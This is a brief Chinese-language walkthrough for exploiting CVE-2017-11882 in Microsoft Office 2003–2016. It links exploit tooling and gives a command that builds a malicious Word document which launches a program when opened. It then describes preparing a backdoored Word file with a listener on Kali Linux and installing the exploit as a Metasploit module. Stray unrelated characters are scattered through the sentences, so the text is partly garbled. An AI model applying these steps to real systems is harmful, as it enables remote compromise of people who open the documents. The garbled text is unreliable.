影響版本:
office 2003
office 2007
office 2010
office 2013
office 2016
工具
https://github.com/Ridter/CVE-2017-11882/
鏈接: https://pan.baidu.com/s/1wkQ3WXps24D6_RB-jW5mLw 提取碼: vd99
實(shí)驗(yàn)流程
生成word文檔test.doc周霉,打開doc文件之后衙传,會(huì)彈出計(jì)算器(以此驗(yàn)證offce漏洞)
python2 Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
在Kali Linux上構(gòu)造帶有shell后門的word文件,并開啟監(jiān)聽
CVE-2017-11882.rb和ms17-010.rb放一起吧葵诈。
ms17-010.rb文件的路徑是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb高诺,把CVE-2017-11882.rb放smb下面万俗,和ms17-010在一起璃吧。